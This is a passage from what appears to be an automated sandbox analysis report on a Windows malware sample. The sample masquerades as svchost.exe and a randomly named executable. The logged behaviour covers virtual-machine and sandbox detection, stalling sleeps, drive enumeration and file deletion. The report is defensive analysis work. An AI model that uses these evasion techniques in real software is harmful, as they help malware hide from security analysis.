Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,9_2_00A411C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,StrStrIA,9_2_00A41150
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,9_2_00A40BE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,9_2_00A42320
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,9_2_00A344F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,9_2_00A42590
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,9_2_00A3FDC0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,9_2_00A23510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,9_2_00A21670
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,9_2_00A3FFE0
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date 0_2_00403900
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date 2_2_00403900
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess graph_0-29896
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_0-29929
Source: C:\Windows\apppatch\svchost.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_2-81097
Source: C:\Windows\apppatch\svchost.exe Stalling execution: Execution stalls by calling Sleep graph_2-80923
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\apppatch\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\system\vmhgfs.DLL
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_00401A30 rdtsc 0_2_00401A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 1484
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 2646
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 1304
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 2834
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C864A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02C864A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_012564A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,7_2_010564A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A364A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,9_2_00A364A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe API coverage: 2.7 %
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe API coverage: 2.9 %
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe API coverage: 2.7 %
Source: C:\Windows\apppatch\svchost.exe TID: 2836 Thread sleep count: 1484 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 2836 Thread sleep time: -148400s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7992 Thread sleep count: 2646 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7992 Thread sleep time: -264600s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7996 Thread sleep count: 1304 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7996 Thread sleep time: -130400s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 7992 Thread sleep count: 2834 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7992 Thread sleep time: -283400s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 3132 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0125BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0125BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01267CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_01267CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0126BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,6_2_0126BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_012466D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01067CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,7_2_01067CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0106BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,7_2_0106BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,7_2_010466D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A47CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_00A47CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A266D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_00A266D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A4BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,9_2_00A4BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
Source: svchost.exe, 00000002.00000003.2178331950.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252938368.0000000000899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD L2CAP [Bluetooth]Hyper-V RAWRSVP UDPv6 Service Provider
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2676884944.0000000000988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP2
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2735525180.0000000000BC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000002.2704786196.0000000001387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: svchost.exe, 00000002.00000003.2223016601.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252938368.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3413265981.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279237129.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001018000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.3407860513.0000000000826000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
